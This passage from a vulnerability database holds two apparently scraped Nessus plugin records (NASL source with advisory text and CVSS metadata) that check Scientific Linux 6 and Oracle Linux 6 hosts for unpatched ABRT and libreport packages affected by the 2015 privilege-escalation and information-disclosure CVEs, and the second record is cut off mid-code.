"obtainUserPrivilege": false}, "cvelist": ["CVE-2015-1869", "CVE-2015-1870", "CVE-2015-3142", "CVE-2015-3147", "CVE-2015-3159", "CVE-2015-3315"], "modified": "2021-01-14T00:00:00", "cpe": ["p-cpe:/a:fermilab:scientific_linux:abrt", "p-cpe:/a:fermilab:scientific_linux:abrt-addon-ccpp", "p-cpe:/a:fermilab:scientific_linux:abrt-addon-kerneloops", "p-cpe:/a:fermilab:scientific_linux:abrt-addon-python", "p-cpe:/a:fermilab:scientific_linux:abrt-addon-vmcore", "p-cpe:/a:fermilab:scientific_linux:abrt-cli", "p-cpe:/a:fermilab:scientific_linux:abrt-console-notification", "p-cpe:/a:fermilab:scientific_linux:abrt-debuginfo", "p-cpe:/a:fermilab:scientific_linux:abrt-desktop", "p-cpe:/a:fermilab:scientific_linux:abrt-devel", "p-cpe:/a:fermilab:scientific_linux:abrt-gui", "p-cpe:/a:fermilab:scientific_linux:abrt-libs", "p-cpe:/a:fermilab:scientific_linux:abrt-python", "p-cpe:/a:fermilab:scientific_linux:abrt-tui", "p-cpe:/a:fermilab:scientific_linux:libreport", "p-cpe:/a:fermilab:scientific_linux:libreport-cli", "p-cpe:/a:fermilab:scientific_linux:libreport-compat", "p-cpe:/a:fermilab:scientific_linux:libreport-debuginfo", "p-cpe:/a:fermilab:scientific_linux:libreport-devel", "p-cpe:/a:fermilab:scientific_linux:libreport-filesystem", "p-cpe:/a:fermilab:scientific_linux:libreport-gtk", "p-cpe:/a:fermilab:scientific_linux:libreport-gtk-devel", "p-cpe:/a:fermilab:scientific_linux:libreport-newt", "p-cpe:/a:fermilab:scientific_linux:libreport-plugin-bugzilla", "p-cpe:/a:fermilab:scientific_linux:libreport-plugin-kerneloops", "p-cpe:/a:fermilab:scientific_linux:libreport-plugin-logger", "p-cpe:/a:fermilab:scientific_linux:libreport-plugin-mailx", "p-cpe:/a:fermilab:scientific_linux:libreport-plugin-reportuploader", "p-cpe:/a:fermilab:scientific_linux:libreport-plugin-rhtsupport", "p-cpe:/a:fermilab:scientific_linux:libreport-python", "x-cpe:/o:fermilab:scientific_linux"], "id": "SL_20150707_ABRT_ON_SL6_X.NASL", "href": "https://www.tenable.com/plugins/nessus/84611", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text is (C) Scientific Linux.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(84611);\n script_version(\"2.8\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2015-1869\", \"CVE-2015-1870\", \"CVE-2015-3142\", \"CVE-2015-3147\", \"CVE-2015-3159\", \"CVE-2015-3315\");\n\n script_name(english:\"Scientific Linux Security Update : abrt on SL6.x i386/x86_64 (20150707)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Scientific Linux host is missing one or more security\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"It was found that ABRT was vulnerable to multiple race condition and\nsymbolic link flaws. A local attacker could use these flaws to\npotentially escalate their privileges on the system. (CVE-2015-3315)\n\nIt was discovered that the kernel-invoked coredump processor provided\nby ABRT wrote core dumps to files owned by other system users. This\ncould result in information disclosure if an application crashed while\nits current directory was a directory writable to by other users (such\nas /tmp). (CVE-2015-3142)\n\nIt was discovered that the default event handling scripts installed by\nABRT did not handle symbolic links correctly. A local attacker with\nwrite access to an ABRT problem directory could use this flaw to\nescalate their privileges. (CVE-2015-1869)\n\nIt was found that the ABRT event scripts created a user-readable copy\nof an sosreport file in ABRT problem directories, and included\nexcerpts of /var/log/messages selected by the user-controlled process\nname, leading to an information disclosure. (CVE-2015-1870)\n\nIt was discovered that, when moving problem reports between certain\ndirectories, abrt-handle-upload did not verify that the new problem\ndirectory had appropriate permissions and did not contain symbolic\nlinks. An attacker able to create a crafted problem report could use\nthis flaw to expose other parts of ABRT, or to overwrite arbitrary\nfiles on the system. (CVE-2015-3147)\n\nIt was discovered that the abrt-action-install-debuginfo-to-abrt-cache\nhelper program did not properly filter the process environment before\ninvoking abrt-action-install-debuginfo. A local attacker could use\nthis flaw to escalate their privileges on the system. (CVE-2015-3159)\"\n );\n # https://listserv.fnal.gov/scripts/wa.exe?A2=ind1507&L=scientific-linux-errata&F=&S=&P=5735\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?53b73d62\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'ABRT raceabrt Privilege Escalation');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:abrt\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:abrt-addon-ccpp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:abrt-addon-kerneloops\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:abrt-addon-python\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:abrt-addon-vmcore\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:abrt-cli\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:abrt-console-notification\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:abrt-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:abrt-desktop\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:abrt-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:abrt-gui\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:abrt-libs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:abrt-python\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:abrt-tui\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:libreport\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:libreport-cli\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:libreport-compat\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:libreport-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:libreport-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:libreport-filesystem\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:libreport-gtk\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:libreport-gtk-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:libreport-newt\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:libreport-plugin-bugzilla\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:libreport-plugin-kerneloops\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:libreport-plugin-logger\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:libreport-plugin-mailx\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:libreport-plugin-reportuploader\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:libreport-plugin-rhtsupport\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:libreport-python\");\n script_set_attribute(attribute:\"cpe\", value:\"x-cpe:/o:fermilab:scientific_linux\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/06/26\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/07/07\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/07/08\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Scientific Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Scientific Linux \" >!< release) audit(AUDIT_HOST_NOT, \"running Scientific Linux\");\nos_ver = pregmatch(pattern: \"Scientific Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Scientific Linux\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^6([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Scientific Linux 6.x\", \"Scientific Linux \" + os_ver);\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu >!< \"x86_64\" && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Scientific Linux\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"SL6\", reference:\"abrt-2.0.8-26.el6_6.1\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"abrt-addon-ccpp-2.0.8-26.el6_6.1\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"abrt-addon-kerneloops-2.0.8-26.el6_6.1\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"abrt-addon-python-2.0.8-26.el6_6.1\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"abrt-addon-vmcore-2.0.8-26.el6_6.1\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"abrt-cli-2.0.8-26.el6_6.1\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"abrt-console-notification-2.0.8-26.el6_6.1\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"abrt-debuginfo-2.0.8-26.el6_6.1\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"abrt-desktop-2.0.8-26.el6_6.1\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"abrt-devel-2.0.8-26.el6_6.1\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"abrt-gui-2.0.8-26.el6_6.1\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"abrt-libs-2.0.8-26.el6_6.1\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"abrt-python-2.0.8-26.el6_6.1\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"abrt-tui-2.0.8-26.el6_6.1\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"libreport-2.0.9-21.el6_6.1\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"libreport-cli-2.0.9-21.el6_6.1\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"libreport-compat-2.0.9-21.el6_6.1\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"libreport-debuginfo-2.0.9-21.el6_6.1\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"libreport-devel-2.0.9-21.el6_6.1\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"libreport-filesystem-2.0.9-21.el6_6.1\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"libreport-gtk-2.0.9-21.el6_6.1\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"libreport-gtk-devel-2.0.9-21.el6_6.1\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"libreport-newt-2.0.9-21.el6_6.1\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"libreport-plugin-bugzilla-2.0.9-21.el6_6.1\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"libreport-plugin-kerneloops-2.0.9-21.el6_6.1\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"libreport-plugin-logger-2.0.9-21.el6_6.1\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"libreport-plugin-mailx-2.0.9-21.el6_6.1\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"libreport-plugin-reportuploader-2.0.9-21.el6_6.1\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"libreport-plugin-rhtsupport-2.0.9-21.el6_6.1\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"libreport-python-2.0.9-21.el6_6.1\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"abrt / abrt-addon-ccpp / abrt-addon-kerneloops / abrt-addon-python / etc\");\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-01-11T14:57:57", "description": "From Red Hat Security Advisory 2015:1210 :\n\nUpdated abrt packages that fix multiple security issues are now available for Red Hat Enterprise Linux 6.\n\nRed Hat Product Security has rated this update as having Moderate security impact. Common Vulnerability Scoring System (CVSS) base scores, which give detailed severity ratings, are available for each vulnerability from the CVE links in the References section.\n\nABRT (Automatic Bug Reporting Tool) is a tool to help users to detect defects in applications and to create a bug report with all the information needed by a maintainer to fix it. It uses a plug-in system to extend its functionality.\n\nIt was found that ABRT was vulnerable to multiple race condition and symbolic link flaws. A local attacker could use these flaws to potentially escalate their privileges on the system. (CVE-2015-3315)\n\nIt was discovered that the kernel-invoked coredump processor provided by ABRT wrote core dumps to files owned by other system users. This could result in information disclosure if an application crashed while its current directory was a directory writable to by other users (such as /tmp). (CVE-2015-3142)\n\nIt was discovered that the default event handling scripts installed by ABRT did not handle symbolic links correctly. A local attacker with write access to an ABRT problem directory could use this flaw to escalate their privileges. (CVE-2015-1869)\n\nIt was found that the ABRT event scripts created a user-readable copy of an sosreport file in ABRT problem directories, and included excerpts of /var/log/messages selected by the user-controlled process name, leading to an information disclosure. (CVE-2015-1870)\n\nIt was discovered that, when moving problem reports between certain directories, abrt-handle-upload did not verify that the new problem directory had appropriate permissions and did not contain symbolic links. An attacker able to create a crafted problem report could use this flaw to expose other parts of ABRT, or to overwrite arbitrary files on the system. (CVE-2015-3147)\n\nIt was discovered that the abrt-action-install-debuginfo-to-abrt-cache helper program did not properly filter the process environment before invoking abrt-action-install-debuginfo. A local attacker could use this flaw to escalate their privileges on the system. (CVE-2015-3159)\n\nThe CVE-2015-1869, CVE-2015-1870, CVE-2015-3142, CVE-2015-3147, and CVE-2015-3159 issues were discovered by Florian Weimer of Red Hat Product Security.\n\nAll users of abrt are advised to upgrade to these updated packages, which correct these issues.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2015-07-08T00:00:00", "type": "nessus", "title": "Oracle Linux 6 : abrt (ELSA-2015-1210)", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-1869", "CVE-2015-1870", "CVE-2015-3142", "CVE-2015-3147", "CVE-2015-3159", "CVE-2015-3315"], "modified": "2021-01-14T00:00:00", "cpe": ["p-cpe:/a:oracle:linux:abrt", "p-cpe:/a:oracle:linux:abrt-addon-ccpp", "p-cpe:/a:oracle:linux:abrt-addon-kerneloops", "p-cpe:/a:oracle:linux:abrt-addon-python", "p-cpe:/a:oracle:linux:abrt-addon-vmcore", "p-cpe:/a:oracle:linux:abrt-cli", "p-cpe:/a:oracle:linux:abrt-console-notification", "p-cpe:/a:oracle:linux:abrt-desktop", "p-cpe:/a:oracle:linux:abrt-devel", "p-cpe:/a:oracle:linux:abrt-gui", "p-cpe:/a:oracle:linux:abrt-libs", "p-cpe:/a:oracle:linux:abrt-python", "p-cpe:/a:oracle:linux:abrt-tui", "p-cpe:/a:oracle:linux:libreport", "p-cpe:/a:oracle:linux:libreport-cli", "p-cpe:/a:oracle:linux:libreport-compat", "p-cpe:/a:oracle:linux:libreport-devel", "p-cpe:/a:oracle:linux:libreport-filesystem", "p-cpe:/a:oracle:linux:libreport-gtk", "p-cpe:/a:oracle:linux:libreport-gtk-devel", "p-cpe:/a:oracle:linux:libreport-newt", "p-cpe:/a:oracle:linux:libreport-plugin-bugzilla", "p-cpe:/a:oracle:linux:libreport-plugin-kerneloops", "p-cpe:/a:oracle:linux:libreport-plugin-logger", "p-cpe:/a:oracle:linux:libreport-plugin-mailx", "p-cpe:/a:oracle:linux:libreport-plugin-reportuploader", "p-cpe:/a:oracle:linux:libreport-python", "cpe:/o:oracle:linux:6"], "id": "ORACLELINUX_ELSA-2015-1210.NASL", "href": "https://www.tenable.com/plugins/nessus/84608", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Red Hat Security Advisory RHSA-2015:1210 and \n# Oracle Linux Security Advisory ELSA-2015-1210 respectively.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(84608);\n script_version(\"2.12\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2015-1869\", \"CVE-2015-1870\", \"CVE-2015-3142\", \"CVE-2015-3147\", \"CVE-2015-3159\", \"CVE-2015-3315\");\n script_bugtraq_id(75116, 75117, 75118, 75119, 75128, 75129);\n script_xref(name:\"RHSA\", value:\"2015:1210\");\n\n script_name(english:\"Oracle Linux 6 : abrt (ELSA-2015-1210)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Oracle Linux host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"From Red Hat Security Advisory 2015:1210 :\n\nUpdated abrt packages that fix multiple security issues are now\navailable for Red Hat Enterprise Linux 6.\n\nRed Hat Product Security has rated this update as having Moderate\nsecurity impact. Common Vulnerability Scoring System (CVSS) base\nscores, which give detailed severity ratings, are available for each\nvulnerability from the CVE links in the References section.\n\nABRT (Automatic Bug Reporting Tool) is a tool to help users to detect\ndefects in applications and to create a bug report with all the\ninformation needed by a maintainer to fix it. It uses a plug-in system\nto extend its functionality.\n\nIt was found that ABRT was vulnerable to multiple race condition and\nsymbolic link flaws. A local attacker could use these flaws to\npotentially escalate their privileges on the system. (CVE-2015-3315)\n\nIt was discovered that the kernel-invoked coredump processor provided\nby ABRT wrote core dumps to files owned by other system users. This\ncould result in information disclosure if an application crashed while\nits current directory was a directory writable to by other users (such\nas /tmp). (CVE-2015-3142)\n\nIt was discovered that the default event handling scripts installed by\nABRT did not handle symbolic links correctly. A local attacker with\nwrite access to an ABRT problem directory could use this flaw to\nescalate their privileges. (CVE-2015-1869)\n\nIt was found that the ABRT event scripts created a user-readable copy\nof an sosreport file in ABRT problem directories, and included\nexcerpts of /var/log/messages selected by the user-controlled process\nname, leading to an information disclosure. (CVE-2015-1870)\n\nIt was discovered that, when moving problem reports between certain\ndirectories, abrt-handle-upload did not verify that the new problem\ndirectory had appropriate permissions and did not contain symbolic\nlinks. An attacker able to create a crafted problem report could use\nthis flaw to expose other parts of ABRT, or to overwrite arbitrary\nfiles on the system. (CVE-2015-3147)\n\nIt was discovered that the abrt-action-install-debuginfo-to-abrt-cache\nhelper program did not properly filter the process environment before\ninvoking abrt-action-install-debuginfo. A local attacker could use\nthis flaw to escalate their privileges on the system. (CVE-2015-3159)\n\nThe CVE-2015-1869, CVE-2015-1870, CVE-2015-3142, CVE-2015-3147, and\nCVE-2015-3159 issues were discovered by Florian Weimer of Red Hat\nProduct Security.\n\nAll users of abrt are advised to upgrade to these updated packages,\nwhich correct these issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://oss.oracle.com/pipermail/el-errata/2015-July/005191.html\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected abrt packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'ABRT raceabrt Privilege Escalation');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:abrt\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:abrt-addon-ccpp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:abrt-addon-kerneloops\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:abrt-addon-python\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:abrt-addon-vmcore\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:abrt-cli\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:abrt-console-notification\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:abrt-desktop\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:abrt-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:abrt-gui\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:abrt-libs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:abrt-python\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:abrt-tui\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:libreport\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:libreport-cli\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:libreport-compat\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:libreport-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:libreport-filesystem\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:libreport-gtk\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:libreport-gtk-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:libreport-newt\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:libreport-plugin-bugzilla\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:libreport-plugin-kerneloops\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:libreport-plugin-logger\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:libreport-plugin-mailx\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:libreport-plugin-reportuploader\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:libreport-python\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:linux:6\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/06/26\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/07/07\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/07/08\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Oracle Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/OracleLinux\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/OracleLinux\")) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || !pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux)\", string:release)) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nos_ver = pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux) .*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Oracle Linux\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^6([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Oracle Linux 6\", \"Oracle Linux \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Oracle Linux\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"EL6\", reference:\"abrt-2.0.8-26.0.1.el6_6.1\")) flag++;\nif (rpm_check(release:\"EL6\", reference:\"abrt-addon-ccpp-2.0.8-26.0.1.el6_6.1\")) flag++;\nif (rpm_check(release:\"EL6\", reference:\"abrt-addon-kerneloops-2.0.8-26.0.1.el6_6.1\")) flag++;\nif (rpm_check(release:\"EL6\", reference:\"abrt-addon-python-2.0.8-26.0.1.el6_6.1\")) flag++;\nif (rpm_check(release:\"EL6\", reference:\"abrt-addon-vmcore-2.0.8-26.0.1.el6_6.1\")) flag++;\nif (rpm_check(release:\"EL6\", reference:\"abrt-cli-2.0.8-26.0.1.el6_6.1\")) flag++;\nif (rpm_check(release:\"EL6\", reference:\"abrt-console-notification-2.0.8-26.0.1.el6_6.1\")) flag++;\nif (rpm_check(release:\"EL6\", reference:\"abrt-desktop-2.0.8-26.0.1.el6_6.1\")) flag++;\nif (rpm_check(release:\"EL6\", reference:\"abrt-devel-2.0.8-26.0.1.el6_6.1\")) flag++;\nif (rpm_check(release:\"EL6\", reference:\"abrt-gui-2.0.8-26.0.1.el6_6.1\")) flag++;\nif (rpm_check(release:\"EL6\", reference:\"abrt-libs-2.0.8-26.0.1.el6_6.1\")) flag++;\nif (rpm_check(release:\"EL6\", reference:\"abrt-python-2.0.8-26.0.1.el6_6.1\")) flag++;\nif (rpm_check(release:\"EL6\", reference:\"abrt-tui-2.0.8-26.0.1.el6_6.1\")) flag++;\nif (rpm_check(release:\"EL6\", reference:\"libreport-2.0.9-21.0.1.el6_6.1\")) flag++;\nif (rpm_check(release:\"EL6\", reference:\"libreport-cli-2.0.9-21.0.1.el6_6.1\")) flag++;\nif (rpm_check(release:\"EL6\", reference:\"libreport-compat-2.0.9-21.0.1.el6_6.1\")) flag++;\nif 